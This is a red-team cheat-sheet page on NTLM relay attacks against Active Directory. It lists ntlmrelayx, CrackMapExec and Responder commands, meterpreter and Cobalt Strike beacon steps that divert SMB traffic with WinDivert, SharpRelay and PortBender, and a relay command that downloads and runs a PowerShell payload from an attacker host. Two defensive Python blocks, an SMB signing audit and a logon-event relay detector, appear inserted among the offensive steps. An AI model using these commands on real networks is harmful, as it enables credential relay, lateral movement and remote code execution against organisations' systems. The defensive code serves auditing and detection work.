# NTLM Relay

* <https://en.hackndo.com/ntlm-relay/>
* <https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>
* <https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/>
* <https://www.secureauth.com/blog/playing-with-relayed-credentials/>
* <https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/>
* <https://intrinium.com/smb-relay-attack-tutorial/>
* <https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/>
* <https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html>
* <https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire>
* <https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/>
* <https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/>
* <https://luemmelsec.github.io/Relaying-101/>
* <https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay>
* <https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/>
* <https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay>
* <https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html>
* <https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/>
* <https://xakep.ru/2023/04/07/ntlm-relay-guide/>
* <https://xakep.ru/2023/04/11/ntlm-relay-guide-2/>
* [\[PDF\] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)](https://www.blackhillsinfosec.com/wp-content/uploads/2022/09/Coercions-and-Relays-The-First-Cred-is-the-Deepest.pdf)

{% embed url="<https://youtu.be/b0lLxLJKaRs>" %}

{% file src="<https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-02c54d7068bddb6982bbce094f3dd50b60bc1633%2FLateral%20Movement%20using%20Credentials%20Relaying%20(taso_x).pdf?alt=media&token=be83ddcb-a219-410c-8a42-9f61de979c4a>" %}

Generate relay list with CME and enumerate local admins when relaying:

```
$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
```
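A relay list is nothing more than the set of SMB servers that do not require message signing, so the defender-side check is to read the SecurityMode flags a server returns in its SMB2 NEGOTIATE response. The following Python is an added audit example (not code from this page, CrackMapExec or impacket); the `check_host` helper, the sample responses and the host names are assumptions, and the sample responses are constructed rather than captured.

```python
"""SMB signing audit: the SecurityMode flags in an SMB2 NEGOTIATE response tell
whether a server requires signing, which is what keeps it out of a relay list.
Added example, not code from this page, CrackMapExec or impacket."""
import socket
import struct
import sys
import uuid

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001   # [MS-SMB2] 2.2.3 / 2.2.4 SecurityMode
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_HEADER_FMT = "<HHIHHIIQIIQ16s"       # header fields after the 4-byte ProtocolId


def _smb2_header(command: int, flags: int) -> bytes:
    return b"\xfeSMB" + struct.pack(
        SMB2_HEADER_FMT, 64, 0, 0, command, 1, flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request(dialects=(0x0202, 0x0210, 0x0300, 0x0302)) -> bytes:
    """NetBIOS session header + SMB2 NEGOTIATE request offering the given dialects."""
    body = struct.pack("<HHHHI16sQ", 36, len(dialects),
                       SMB2_NEGOTIATE_SIGNING_ENABLED, 0, 0, uuid.uuid4().bytes, 0)
    body += b"".join(struct.pack("<H", d) for d in dialects)
    msg = _smb2_header(0, 0) + body
    return struct.pack(">I", len(msg)) + msg   # type byte 0x00 + 3-byte length


def parse_negotiate_response(data: bytes) -> dict:
    """Extract dialect and signing flags from an SMB2 NEGOTIATE response."""
    if data[:4] != b"\xfeSMB" and data[4:8] == b"\xfeSMB":
        data = data[4:]                          # strip NetBIOS session header
    if data[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    status, command = struct.unpack_from("<IH", data, 8)
    if command != 0 or status != 0:
        raise ValueError(f"unexpected command={command} status={status:#010x}")
    struct_size, sec_mode, dialect = struct.unpack_from("<HHH", data, 64)
    if struct_size != 65:
        raise ValueError("malformed NEGOTIATE response body")
    return {
        "dialect": f"{dialect >> 8}.{dialect & 0xFF:02x}",
        "signing_enabled": bool(sec_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(sec_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def verdict(info: dict) -> str:
    """A server that merely enables signing still accepts unsigned (relayed) sessions."""
    if info["signing_required"]:
        return "OK: signing required"
    return "EXPOSED: signing not required, relay candidate"


def check_host(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Live check against one host (hypothetical helper; assumes TCP/445 is reachable)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate_request())
        nb_header = sock.recv(4)
        length = int.from_bytes(nb_header[1:], "big")
        data = b""
        while len(data) < length:
            chunk = sock.recv(length - len(data))
            if not chunk:
                raise ConnectionError("short read from server")
            data += chunk
    return parse_negotiate_response(data)


def _sample_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed NEGOTIATE response for offline testing (not captured from a real host)."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       b"\x00" * 16, 0, 8388608, 8388608, 8388608, 0, 0, 128, 0, 0)
    return _smb2_header(0, 1) + body + b"\x00"   # flags=1: server-to-redirector


# Constructed samples: a workstation that only enables signing, a DC that requires it.
WORKSTATION_SAMPLE = _sample_response(SMB2_NEGOTIATE_SIGNING_ENABLED)
DC_SAMPLE = _sample_response(SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED)
DC_SAMPLE_NB = len(DC_SAMPLE).to_bytes(4, "big") + DC_SAMPLE   # with NetBIOS header

if __name__ == "__main__":
    for target in sys.argv[1:]:
        print(target, verdict(check_host(target)))
```

The distinction the script makes is the one that matters for hardening: `signing_enabled` alone (the default on member workstations and servers) still lets an unsigned, relayed session through; only `signing_required` (the default on domain controllers) closes SMB as a relay target, so the audit reports anything without that flag.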

Relay & catch hashes (via [multi-relay](https://www.thehacker.recipes/ad/movement/ntlm/relay#tips-and-tricks)):

```
$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445
```

{% hint style="info" %}
The easier way, though, is to combine the `-of/--output-file hashes.txt` and `-ntlmchallenge 1122334455667788` options, which save the hashes with a predefined challenge to a file while relaying.
{% endhint %}

Relay NTLMv2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP server must be `Off`):

{% embed url="<https://twitter.com/theluemmel/status/1455099572305416197>" %}

```
$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v
```
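On the receiving end, a relayed SMB or LDAP session shows up on the target as a network (type 3) NTLM logon whose `WorkstationName` is the victim client's name while `IpAddress` is the relay box, so the two disagree with the asset inventory. The following Python is an added detection example (not from this page or any of the tools it references) that runs that heuristic over 4624 events; the inventory, the JSON event shape and the event lines are constructed assumptions.

```python
"""Relay detection heuristic over Security 4624 events: a relayed NTLM network logon
carries the victim's WorkstationName but the relay host's IpAddress.
Added example, not code from this page or the tools it references."""
import json

# Constructed inventory (hypothetical): expected IP per workstation name.
SAMPLE_INVENTORY = {"WS01": "192.168.2.10", "WS02": "192.168.2.11", "WS03": "192.168.2.13"}

# Constructed 4624 events in the JSON shape a SIEM export might use; not real logs.
SAMPLE_EVENTS = """\
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V2","TargetUserName":"j.doe","TargetDomainName":"MEGACORP","WorkstationName":"WS01","IpAddress":"192.168.2.10","Computer":"FS01.megacorp.local"}
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V2","TargetUserName":"j.doe","TargetDomainName":"MEGACORP","WorkstationName":"WS01","IpAddress":"192.168.2.77","Computer":"FS01.megacorp.local"}
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"Kerberos","TargetUserName":"a.smith","TargetDomainName":"MEGACORP","WorkstationName":"WS02","IpAddress":"192.168.2.11","Computer":"FS01.megacorp.local"}
{"EventID":4624,"LogonType":2,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V2","TargetUserName":"j.doe","TargetDomainName":"MEGACORP","WorkstationName":"WS01","IpAddress":"-","Computer":"WS01.megacorp.local"}
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V1","TargetUserName":"svc_backup","TargetDomainName":"MEGACORP","WorkstationName":"WS03","IpAddress":"192.168.2.12","Computer":"DC01.megacorp.local"}
"""


def parse_events(lines):
    """Yield one event dict per non-empty JSON line."""
    for line in lines:
        line = line.strip()
        if line:
            yield json.loads(line)


def detect_relay_candidates(lines, inventory):
    """Return NTLM network logons whose source address disagrees with the named
    workstation, plus any NTLMv1 responses (weak and relayable to more targets)."""
    findings = []
    for ev in parse_events(lines):
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue                       # interactive/local logons are not relays
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue                       # Kerberos logons are out of scope here
        workstation = ev.get("WorkstationName", "").upper()
        ip = ev.get("IpAddress", "-")
        reasons = []
        expected = inventory.get(workstation)
        if expected is None:
            reasons.append("workstation not in inventory")
        elif expected != ip:
            reasons.append(f"workstation/ip mismatch (expected {expected})")
        if ev.get("LmPackageName", "").upper().endswith("V1"):
            reasons.append("NTLMv1 response")
        if reasons:
            findings.append({
                "user": ev.get("TargetDomainName", "") + "\\" + ev.get("TargetUserName", ""),
                "workstation": workstation,
                "ip": ip,
                "target": ev.get("Computer"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in detect_relay_candidates(SAMPLE_EVENTS.splitlines(), SAMPLE_INVENTORY):
        print(f"{f['user']} from {f['workstation']}@{f['ip']} -> {f['target']}: {', '.join(f['reasons'])}")
```

The mismatch rule is noisy on its own: VPN pools, NAT and DHCP churn produce the same disagreement, so a hit is corroborated with the victim's own 4624/4648 events at the same time and with the target being one the account never authenticates to. Enforcing SMB signing, LDAP signing and channel binding removes the class of event instead of detecting it.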

## Relaying on Windows

### meterpreter + SharpRelay

* <https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/>
* <https://github.com/pkb1s/SharpRelay>

Divert incoming SMB traffic from Victim to Attacker's local 445 port through an elevated meterpreter session and relay it to Target via MSF SOCKS server.

1\. Add a static route to the Target through the 1st meterpreter session:

```
meterpreter > route add 192.168.1.11/32 1
```

2\. Start MSF SOCKS server:

```
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
```

3\. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:

```
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
```

4\. Relay the diverted traffic to Target through SOCKS:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support
```

{% hint style="warning" %}
Once run, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:

```
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)
```

{% endhint %}

### beacon + PortBender

* <https://github.com/praetorian-inc/PortBender>
* <https://rastamouse.me/ntlm-relaying-via-cobalt-strike/>

Set SOCKS server & port forwarding, upload WinDivert driver and configure redirection with PortBender:

```
beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
```

Relay the planet:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'
```

Stop PortBender:

```
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>
```

### gost (GO Simple Tunnel)

* <https://github.com/ginuerzh/gost>

```
Cmd > gost.exe -L auto://0.0.0.0:31337
$ gost -L rtcp://0.0.0.0:445/10.10.13.37:445 -F socks5://127.0.0.1:10080 [-F socks5://127.0.0.1:20080 ...] -F socks5://192.168.1.11:31337
```

## CVE-2019-1040

* <https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py>

```
$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz
```

## CVE-2025-33073

* [\[PDF\] Reflective Kerberos Relay Attack (RedTeam Pentesting)](https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf)
* <https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/>
* <https://aegisbyte.com/resources/reflective-kerberos-relay-attack>
* <https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025>

### CVE-2025-54918

* <https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/>
* <https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1>
* <https://github.com/Wh0am123/CVE-2025-54918-POC>
